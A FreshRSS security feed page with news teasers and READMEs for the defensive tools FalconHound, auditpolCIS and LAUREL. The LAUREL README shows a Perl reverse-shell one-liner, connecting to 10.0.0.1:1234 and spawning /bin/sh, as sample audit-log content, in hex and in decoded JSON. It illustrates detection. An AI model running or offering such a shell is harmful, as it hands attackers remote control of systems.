FreshRSS


4-Step Approach to Mapping and Securing Your Organization's Most Critical Assets

You’re probably familiar with the term β€œcritical assets”. These are the technology assets within your company's IT infrastructure that are essential to the functioning of your organization. If anything happens to these assets, such as application servers, databases, or privileged identities, the ramifications to your security posture can be severe.  But is every technology asset considered

SHQ Response Platform and Risk Centre to Enable Management and Analysts Alike

In the last decade, there has been a growing disconnect between front-line analysts and senior management in IT and Cybersecurity. Well-documented challenges facing modern analysts revolve around a high volume of alerts, false positives, poor visibility of technical environments, and analysts spending too much time on manual tasks. The Impact of Alert Fatigue and False Positives  Analysts

Detecting Windows-based Malware Through Better Visibility

Despite a plethora of available security solutions, more and more organizations fall victim to ransomware and other threats. These continued threats aren't just an inconvenience that hurts businesses and end users - they damage the economy, endanger lives, destroy businesses and put national security at risk. But if that wasn't enough – North Korea appears to be using revenue from cyber

How to Achieve the Best Risk-Based Alerting (Bye-Bye SIEM)

Did you know that Network Detection and Response (NDR) has become the most effective technology to detect cyber threats? In contrast to SIEM, NDR offers adaptive cybersecurity with reduced false alerts and efficient threat response. NDR massively

FalconHound - A Blue Team Multi-Tool. It Allows You To Utilize And Enhance The Power Of BloodHound In A More Automated Fashion

By: Zion3R


FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of BloodHound in a more automated fashion. It is designed to be used in conjunction with a SIEM or other log aggregation tool.

One of the challenging aspects of BloodHound is that it is a snapshot in time. FalconHound includes functionality that can be used to keep a graph of your environment up-to-date. This allows you to see your environment as it is NOW. This is especially useful for environments that are constantly changing.

Some of the hardest relationships to gather for BloodHound are local group memberships and session information. As blue teamers we have this information readily available in our logs. FalconHound can be used to gather this information and add it to the graph, allowing it to be used by BloodHound.

This is just an example of how FalconHound can be used. It can be used to gather any information that you have in your logs or security tools and add it to the BloodHound graph.

Additionally, the graph can be used to trigger alerts or generate enrichment lists. For example, if a user is added to a certain group, FalconHound can be used to query the graph database for the shortest path to a sensitive or high-privilege group. If there is a path, this can be logged to the SIEM or used to trigger an alert.
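For example, a Cypher query along these lines (a sketch; the group name and the $UserSid parameter are illustrative) could be run whenever a group membership changes:

MATCH (u:User {objectid:$UserSid}), (g:Group {name:'DOMAIN ADMINS@CONTOSO.LOCAL'})
MATCH p = shortestPath((u)-[*1..]->(g))
RETURN p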


Other examples where FalconHound can be used:

  • Adding, removing or timing out sessions in the graph, based on logon and logoff events.
  • Marking users and computers as compromised in the graph when they have an incident in Sentinel or MDE.
  • Adding CVE information and whether there is a public exploit available to the graph.
  • All kinds of Azure activities.
  • Recalculating the shortest path to sensitive groups when a user is added to a group or has a new role.
  • Adding new users, groups and computers to the graph.
  • Generating enrichment lists for Sentinel and Splunk of, for example, Kerberoastable users or users with ownerships of certain entities.

The possibilities are endless here. Please add more ideas to the issue tracker or submit a PR.

A blog post detailing why we developed it, along with some use-case examples, can be found here


Supported data sources and targets

FalconHound is designed to be used with BloodHound. It is not a replacement for BloodHound. It is designed to leverage the power of BloodHound and all other data platforms it supports in an automated fashion.

Currently, FalconHound supports the following data sources and/or targets:

  • Azure Sentinel
  • Azure Sentinel Watchlists
  • Splunk
  • Microsoft Defender for Endpoint
  • Neo4j
  • MS Graph API (early stage)
  • CSV files

Additional data sources and targets are planned for the future.

At this moment, FalconHound only supports the Neo4j database for BloodHound. Support for the API of BH CE and BHE is under active development.


Installation

Since FalconHound is written in Go, no installation is required: just download a binary from the releases section and run it. Compiled binaries are available for Windows, Linux and macOS.

Before you can run it, you need to create a config file. You can find an example config file in the root folder. Instructions on how to create all credentials can be found here.

The recommended way to run FalconHound is as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date.
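For example, a crontab entry along these lines (assuming the binary and its config live in /opt/falconhound, an illustrative path) runs it every 15 minutes, matching the cadence suggested under Deployment:

*/15 * * * * cd /opt/falconhound && ./falconhound -go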

Requirements

  • BloodHound, or at least the Neo4j database for now.
  • A SIEM or other log aggregation tool. Currently, Azure Sentinel and Splunk are supported.
  • Credentials for each endpoint you want to talk to, with the required permissions.

Configuration

FalconHound is configured using a YAML file. You can find an example config file in the root folder. Each section of the config file is explained below.
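As a rough sketch of what such a file can contain (the flat key names here are an assumption, mirroring the Keyvault item names listed under Credential management below; the example config in the repository is authoritative):

Neo4jUri: bolt://localhost:7687
Neo4jUsername: neo4j
Neo4jPassword: "<secret>"
SentinelTenantID: "<tenant id>"
SentinelAppID: "<app id>"
SentinelAppSecret: "<secret>"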


Usage

Default run

To run FalconHound, just run the binary and add the -go parameter to have it run all queries in the actions folder.

./falconhound -go

List all enabled actions

To list all enabled actions, use the -actionlist parameter. This will list all actions that are enabled in the config files in the actions folder. This should be used in combination with the -go parameter.

./falconhound -actionlist -go

Run with a select set of actions

To run a select set of actions, use the -ids parameter, followed by one or a list of comma-separated action IDs. This will run the actions that are specified in the parameter, which can be very handy when testing, troubleshooting or when you require specific, more frequent updates. This should be used in combination with the -go parameter.

./falconhound -ids action1,action2,action3 -go

Run with a different config file

By default, FalconHound will look for a config file in the current directory. You can also specify a config file using the -config flag. This can allow you to run multiple instances of FalconHound with different configurations, against different environments.

./falconhound -go -config /path/to/config.yml

Run with a different actions folder

By default, FalconHound will look for the actions folder in the current directory. You can also specify a different folder using the -actions-dir flag. This makes testing and troubleshooting easier, but also allows you to run multiple instances of FalconHound with different configurations, against different environments, or at different time intervals.

./falconhound -go -actions-dir /path/to/actions

Run with credentials from a keyvault

By default, FalconHound will use the credentials in the config.yml (or a custom loaded one). By setting the -keyvault flag, FalconHound will read the keyvault details from the config and retrieve all secrets from there. Should items be missing from the keyvault, it will fall back to the config file.

./falconhound -go -keyvault

Actions

Actions are the core of FalconHound: they are the queries that FalconHound will run. They are written in the native language of the source and target and are stored in the actions folder. Each action is a separate file, stored in the sub-directory of its query source, and the filename is used as the name of the action.

Action folder structure

The action folder is divided into sub-directories per query source. All folders will be processed recursively and all YAML files will be executed in alphabetical order.

The Neo4j actions should be processed last, since their output relies on other data sources to have updated the graph database first, to get the most up-to-date results.
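For instance, a hypothetical layout with one sub-directory per query source (all file names illustrative) could look like:

actions/
  mde/
    devices-exploitable.yml
  sentinel/
    sessions-logon.yml
  neo4j/
    paths-to-tier0.yml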

Action files

All files are YAML files. The YAML file contains the query, some metadata and the target(s) of the queried information.

There is a template file available in the root folder. You can use this to create your own actions. Have a look at the actions in the actions folder for more examples.

While most items are fairly self-explanatory, there are some important things to note about actions:

Enabled

As the name implies, this is used to enable or disable an action. If this is set to false, the action will not be run.

Enabled: true

Debug

This is used to enable or disable debug mode for an action. If set to true, the action will be run in debug mode and the results of the query will be output to the console. This is useful for testing and troubleshooting, but is not recommended in production, since it slows down processing of the action depending on the number of results.

Debug: false

Query

The Query field is the query that will be run against the source. This can be a KQL query, a SPL query or a Cypher query depending on your SourcePlatform. IMPORTANT: Try to keep the query as exact as possible and only return the fields that you need. This will make the processing of the results faster and more efficient.

Additionally, when running Cypher queries, make sure to RETURN a JSON object as the result, otherwise processing will fail. For example, this will return the Name, Count, Role and Owners of the Azure Subscriptions:

MATCH p = (n)-[r:AZOwns|AZUserAccessAdministrator]->(g:AZSubscription) 
RETURN {Name:g.name , Count:COUNT(g.name), Role:type(r), Owners:COLLECT(n.name)}
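Putting these fields together, a complete action file might look like the sketch below. The ID, query and target values are illustrative, not taken from the repository; the template file in the root folder remains the authoritative reference, and target options are covered in the next section.

ID: sentinel-sessions        # hypothetical action ID, usable with -ids
SourcePlatform: Sentinel
Enabled: true
Debug: false
Query: |
  SecurityEvent
  | where EventID == 4624
  | project Computer, TargetUserSid, Timestamp=TimeGenerated
Targets:
  - Name: CSV
    Enabled: true
    Path: output/sessions.csv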

Targets

Each target has several options that can be configured. Depending on the target, some might require more configuration than others. All targets have the Name and Enabled fields. The Name field is used to identify the target. The Enabled field is used to enable or disable the target. If this is set to false, the target will be ignored.

CSV

  - Name: CSV
    Enabled: true
    Path: path/to/filename.csv

Neo4j

The Neo4j target will write the results of the query to a Neo4j database. Output is written per result row, so this target requires some additional configuration. Since we can transfer all sorts of data in all directions, FalconHound needs to understand what to do with the data. This is done by using replacement variables in the first line of your Cypher queries. These are passed to Neo4j as parameters and can be used in the query. The Parameters fields are configured below.

  - Name: Neo4j
    Enabled: true
    Query: |
      MATCH (x:Computer {name:$Computer}) MATCH (y:User {objectid:$TargetUserSid}) MERGE (x)-[r:HasSession]->(y) SET r.since=$Timestamp SET r.source='falconhound'
    Parameters:
      Computer: Computer
      TargetUserSid: TargetUserSid
      Timestamp: Timestamp

The Parameters section defines a set of parameters that will be replaced by the values from the query results. These can be referenced as Neo4j parameters using the $parameter_name syntax.

Sentinel

The Sentinel target will write the results of the query to a Sentinel table. The table will be created if it does not exist. The table will be created in the workspace that is specified in the config file. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

This is also why query output needs to be controlled: you might otherwise flood your target.

  - Name: Sentinel
    Enabled: true

Sentinel Watchlists

The Sentinel Watchlists target will write the results of the query to a Sentinel watchlist. The watchlist will be created if it does not exist. The watchlist will be created in the workspace that is specified in the config file. All columns returned by the query will be added to the watchlist.

  - Name: Watchlist
    Enabled: true
    WatchlistName: FH_MDE_Exploitable_Machines
    DisplayName: MDE Exploitable Machines
    SearchKey: DeviceName
    Overwrite: true

The WatchlistName field is the name of the watchlist. The DisplayName field is the display name of the watchlist.

The SearchKey field is the column that will be used as the search key.

The Overwrite field is used to determine if the watchlist should be overwritten or appended to. If this is set to false, the results of the query will be appended to the watchlist. If this is set to true, the watchlist will be deleted and recreated with the results of the query.

Splunk

Like the Sentinel target, the Splunk target will write the results of the query to a Splunk index. The index will need to be created and tied to a HEC endpoint. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

  - Name: Splunk
    Enabled: true

Azure Data Explorer

Like the Sentinel target, the ADX target will write the results of the query to an ADX table. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

  - Name: ADX
    Enabled: true
    Table: "name"

Extensions to the graph

Relationship: HadSession

Once a session has ended, it would have to be removed from the graph, but that felt like a waste of information. So instead of being removed, the session is added as a relationship between the computer and the user, called HadSession. The relationship has the following properties:

{
  "till": "2021-08-31T14:00:00Z",
  "source": "falconhound",
  "reason": "logoff"
}

This allows for additional path discoveries where we can investigate whether the user ever logged on to a certain system, even if the session has ended.
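A path query along these lines (a sketch; the computer name is illustrative) surfaces every user who at some point had a session on a given host:

MATCH (c:Computer {name:'SRV01.CONTOSO.LOCAL'})-[r:HadSession]->(u:User)
RETURN u.name, r.till, r.reason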

Properties

FalconHound will add the following properties to nodes in the graph:

Computer:

  • 'exploitable': true/false
  • 'exploits': list of CVEs
  • 'exposed': true/false
  • 'ports': list of ports accessible from the internet
  • 'alertids': list of alert ids
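These properties can then be used directly in graph queries, for example (a sketch) to list machines that are both exploitable and exposed to the internet:

MATCH (c:Computer {exploitable:true, exposed:true})
RETURN c.name, c.exploits, c.ports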

Credential management

The currently supported ways of providing FalconHound with credentials are:

  • Via the config.yml file on disk.
  • Keyvault secrets. This still requires a ServicePrincipal with secrets in the yaml.
  • Mixed mode.

Config.yml

The config file holds all details required by each platform. All items in the config file are case-sensitive. Best practice is to use a separate app per service, but you can use one AppID/AppSecret for all Azure-based actions.

The required permissions for your AppID/AppSecret are listed here.

Keyvault

A more secure way of storing the credentials is to use an Azure KeyVault. Be aware that there is a small cost aspect to using Keyvaults. Access to KeyVaults currently only supports authentication based on an AppID/AppSecret, which needs to be configured in the config.yml file.

The recommended way to set this up is to use a ServicePrincipal that only has the Key Vault Secrets User role on this Keyvault. This role only allows reading secret values; it does not even allow listing them. Do NOT reuse the ServicePrincipal which has access to Sentinel and/or MDE, since this almost completely negates the use of a Keyvault.
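For example, with the Azure CLI (all IDs and names below are placeholders, and the vault is assumed to use Azure RBAC rather than access policies), the role can be scoped to just that Keyvault:

az role assignment create \
  --assignee <service-principal-app-id> \
  --role "Key Vault Secrets User" \
  --scope "/subscriptions/<sub-id>/resourceGroups/<rg>/providers/Microsoft.KeyVault/vaults/<vault-name>"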

The items to configure in the Keyvault are listed below. Please note Keyvault secrets are not case-sensitive.

SentinelAppSecret
SentinelAppID
SentinelTenantID
SentinelTargetTable
SentinelResourceGroup
SentinelSharedKey
SentinelSubscriptionID
SentinelWorkspaceID
SentinelWorkspaceName
MDETenantID
MDEAppID
MDEAppSecret
Neo4jUri
Neo4jUsername
Neo4jPassword
GraphTenantID
GraphAppID
GraphAppSecret
AdxTenantID
AdxAppID
AdxAppSecret
AdxClusterURL
AdxDatabase
SplunkUrl
SplunkApiToken
SplunkIndex
SplunkApiPort
SplunkHecToken
SplunkHecPort
BHUrl
BHTokenID
BHTokenKey
LogScaleUrl
LogScaleToken
LogScaleRepository

Once configured you can add the -keyvault parameter while starting FalconHound.

Mixed mode / fallback

When the -keyvault parameter is set on the command-line, this will be the primary source for all required secrets. Should FalconHound fail to retrieve items, it will fall back to the equivalent item in the config.yml. If both fail and there are actions enabled for that source or target, it will throw errors on attempts to authenticate.

Deployment

FalconHound is designed to be run as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date. Depending on the number of actions you have enabled and the amount of data you are processing and writing to the graph, a run can take a while.

All log-based queries are built to run every 15 minutes. Should processing take too long, you might need to tweak this interval, or disable certain actions.

There might also be some overlap, for instance with the session actions. If you have a lot of sessions, you might want to disable the session actions for Sentinel and rely on the ones from MDE. This assumes you have MDE and Sentinel connected and most machines onboarded into MDE.

Sharphound / Azurehound

While FalconHound is designed to be used with BloodHound, it is not a replacement for Sharphound and Azurehound. It is designed to complement their collection and remove the moment-in-time problem of periodic collection. Both Sharphound and Azurehound are still required to collect the data, since not all of the equivalent data is available in logs.

It is recommended to run Sharphound and Azurehound on a regular basis, for example once a day, week or month, and FalconHound every 15 minutes.

License

This project is licensed under the BSD3 License - see the LICENSE file for details.

This means you can use this software for free, even in commercial products, as long as you credit us for it. You cannot hold us liable for any damages caused by this software.



Building a Robust Threat Intelligence with Wazuh

Threat intelligence refers to gathering, processing, and analyzing cyber threats, along with proactive defensive measures aimed at strengthening security. It enables organizations to gain a comprehensive insight into historical, present, and anticipated threats, providing context about the constantly evolving threat landscape. Importance of threat intelligence in the cybersecurity ecosystem

CISA Adds Three Security Flaws with Active Exploitation to KEV Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added three security flaws to its Known Exploited Vulnerabilities (KEV) catalog based on evidence of active exploitation in the wild. The vulnerabilities are as follows - CVE-2023-36584 (CVSS score: 5.4) - Microsoft Windows Mark-of-the-Web (MotW) Security Feature Bypass Vulnerability CVE-2023-1671 (CVSS score: 9.8) -

Three CISOs Share How to Run an Effective SOC

The role of the CISO keeps taking center stage as a business enabler: CISOs need to navigate the complex landscape of digital threats while fostering innovation and ensuring business continuity. Three CISOs (Troy Wilkinson, CISO at IPG; Rob Geurtsen, former Deputy CISO at Nike; and Tammy Moskites, Founder of CyAlliance and former CISO at companies like Time Warner and Home Depot) shared their

Enhancing Security Operations Using Wazuh: Open Source XDR and SIEM

In today's interconnected world, evolving security solutions to meet growing demand is more critical than ever. Collaboration across multiple solutions for intelligence gathering and information sharing is indispensable. The idea of multiple-source intelligence gathering stems from the concept that threats are rarely isolated. Hence, their detection and prevention require a comprehensive

How Wazuh Improves IT Hygiene for Cyber Security Resilience

IT hygiene is a security best practice that ensures that digital assets in an organization's environment are secure and running properly. Good IT hygiene includes vulnerability management, security configuration assessments, maintaining asset and system inventories, and comprehensive visibility into the activities occurring in an environment. As technology advances and the tools used by

auditpolCIS - CIS Benchmark Testing Of Windows SIEM Configuration


CIS Benchmark testing of Windows SIEM configuration

This is an application for testing the configuration of Windows Audit Policy settings against the CIS Benchmark recommended settings. A few points:

  • The tested system was Windows Server 2019, and the benchmark used was also Windows Server 2019.
  • The script connects over SSH. SSH is included with Windows Server 2019; it just has to be enabled. If you would like to see WinRM (or other) connection types, let me know or send a PR.
  • Some tests are included here which were not included in the CIS guide. The recommended settings for these Subcategories are based on the logging volume for these events, versus the security value. In nearly all cases, the recommendation is to turn off auditing for these settings.
  • The YAML file cis-benchmarks.yaml is the YAML representation of the CIS Benchmark guideline for each Subcategory.
  • The command run under SSH is auditpol /get /category:* (an abbreviated sample of its output is shown below).
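For reference, auditpol /get /category:* produces output resembling this abbreviated sample (subcategories and settings vary per system):

System audit policy
Category/Subcategory                      Setting
System
  Security System Extension               No Auditing
  System Integrity                        Success and Failure
Logon/Logoff
  Logon                                   Success and Failure
  Logoff                                  Success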


Further details on usage and other background info are at https://www.seven-stones.biz/blog/auditpolcis-automating-windows-siem-cis-benchmarks-testing/



Auditing Kubernetes with Open Source SIEM and XDR

Container technology has gained traction among businesses due to the increased efficiency it provides. In this regard, organizations widely use Kubernetes for deploying, scaling, and managing containerized applications. Organizations should audit Kubernetes to ensure compliance with regulations, find anomalies, and identify security risks. The Wazuh open source platform plays a critical role in

Over 100 Siemens PLC Models Found Vulnerable to Firmware Takeover

Security researchers have disclosed multiple architectural vulnerabilities in Siemens SIMATIC and SIPLUS S7-1500 programmable logic controllers (PLCs) that could be exploited by a malicious actor to stealthily install firmware on affected devices and take control of them. Discovered by Red Balloon Security, the issues are tracked as CVE-2022-38773 (CVSS score: 4.6), with the low severity

CISA Warns of Critical Flaws Affecting Industrial Appliances from Advantech and Hitachi

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday released two Industrial Control Systems (ICS) advisories pertaining to severe flaws in Advantech R-SeeNet and Hitachi Energy APM Edge appliances. This consists of three weaknesses in the R-SeeNet monitoring solution, successful exploitation of which "could result in an unauthorized attacker remotely deleting files on the

Critical Bug in Siemens SIMATIC PLCs Could Let Attackers Steal Cryptographic Keys

A vulnerability in Siemens SIMATIC programmable logic controllers (PLCs) can be exploited to retrieve the hard-coded, global private cryptographic keys and seize control of the devices. "An attacker can use these keys to perform multiple advanced attacks against Siemens SIMATIC devices and the related TIA Portal, while bypassing all four of its access level protections," industrial cybersecurity

Improve your security posture with Wazuh, a free and open source XDR

Organizations struggle to find ways to keep a good security posture. This is because it is difficult to create secure system policies and find the right tools that help achieve a good posture. In many cases, organizations work with tools that do not integrate with each other and are expensive to purchase and maintain. Security posture management is a term used to describe the process of

Laurel - Transform Linux Audit Logs For SIEM Usage


LAUREL is an event post-processing plugin for auditd(8) to improve its usability in modern security monitoring setups.


Why?

TLDR: Instead of audit events that look like this…

type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

…turn them into JSON logs where the mess that your pen testers/red teamers/attackers are trying to make becomes apparent at first glance:

{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}

This happens at the source. The generated event even contains useful information about the spawning process:

"PARENT_INFO":{"ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}

Description

Logs produced by the Linux Audit subsystem and auditd(8) contain information that can be very useful in a SIEM context (if a useful rule set has been configured). However, the format is not well-suited for at-scale analysis: Events are usually split across different lines that have to be merged using a message identifier. Files and program executions are logged via PATH and EXECVE elements, but a limited character set for strings causes many of those entries to be hex-encoded. For a more detailed discussion, see Practical auditd(8) problems.

LAUREL solves these problems by consuming audit events, parsing and transforming them, and writing them out as a JSON-based log format, while keeping intact all information that was part of the original audit log. It does not replace auditd(8) as the consumer of audit messages from the kernel. Instead, it uses the audisp ("audit dispatch") interface to receive messages via auditd(8). Therefore, it can peacefully coexist with other consumers of audit events (e.g. some EDR products).

Refer to JSON-based log format for a description of the log format.

We developed this tool because we were not content with feature sets and performance characteristics of existing projects and products. Please refer to Performance for details.

A word about audit rules

A good starting point for an audit ruleset is https://github.com/Neo23x0/auditd, but generally speaking, any ruleset will do. LAUREL will currently only work as designed if End Of Event (EOE) records are not suppressed, so rules like

-a always,exclude -F msgtype=EOE

should be removed.

Events with context

Every event that is caused by a syscall or filesystem rule is annotated with information about the parent of the process that caused the event. If available, id points to the message corresponding to the last execve syscall for this process:

"PARENT_INFO": {
"ID": "1643635026.276:327308",
"comm": "sh",
"exe": "/usr/bin/dash",
"ppid": 1532
}

Adding more context: Keys and process labels

Audit events can contain a key, a short string that can be used to filter events. LAUREL can be configured to recognize such keys and attach them as labels to the process that caused the event. These labels can also be propagated to child processes. This is useful to avoid expensive JOIN-like operations in log analysis when filtering out harmless events.

Consider the following rule, which sets a key for apt-get invocations:

-w /usr/bin/apt-get -p x -k software_mgmt

Let's configure LAUREL to turn the software_mgmt key into a process label that is propagated to child processes:

Together with a ruleset that logs execve(2) and variants, this will cause every event directly caused by apt-get and its subprocesses to be labelled software_mgmt.

For example, when running sudo apt-get update on a Debian/bullseye system with a few sources configured, the following subprocesses, all labelled software_mgmt, can be observed in LAUREL's audit log:

  • apt-get update
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/https
  • /usr/lib/apt/methods/https
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/gpgv
  • /usr/lib/apt/methods/gpgv
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/bin/dpkg --print-foreign-architectures

This sort of tracking also works for package installation or removal. If some package's post-installation script is behaving suspiciously, a SIEM analyst will be able to make the connection to the software installation process by inspecting a single event.

Installation

See INSTALL.md.

License

GNU General Public License, version 3

Authors

The logo was created by Birgit Meyer <hello@biggi.io>.


